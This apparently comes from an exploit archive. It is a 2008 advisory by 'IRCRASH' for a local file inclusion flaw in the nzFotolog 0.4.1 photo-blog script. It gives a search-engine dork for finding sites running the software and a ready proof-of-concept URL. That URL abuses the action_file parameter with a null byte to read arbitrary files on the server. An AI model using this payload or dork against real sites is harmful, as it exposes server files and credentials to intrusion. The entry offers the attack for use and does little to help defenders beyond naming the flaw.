id: 3475
date: 07/29/2008
title: nzFotolog 0.4.1 (action_file) Local File Inclusion Vulnerability
author: IRCRASH
cves: 

================================================================
nzFotolog 0.4.1 (action_file) Local File Inclusion Vulnerability
================================================================



#####################################################################################
####                           nzFotolog v0.4.1 (Lfi)                            ####
#####################################################################################
#                                                                                   #
#AUTHOR : IRCRASH (R3d.W0rm)                                                        #
#####################################################################################
#                                                                                   #
#Script Download : www.nazgulled.net                                                #
#                                                                                   #
#DORK : "Powered by nzFotolog v0.4.1 © 2005-2006 Ricardo Amaral"                    #
#                                                                                   #
#####################################################################################
#                                       [Lfi]                                       #
#                                                                                   #
#http://Example/index.php?action_file=file.type%00                                  #
#                                                                                   #
#####################################################################################



#  0day.today [2023-03-27]  #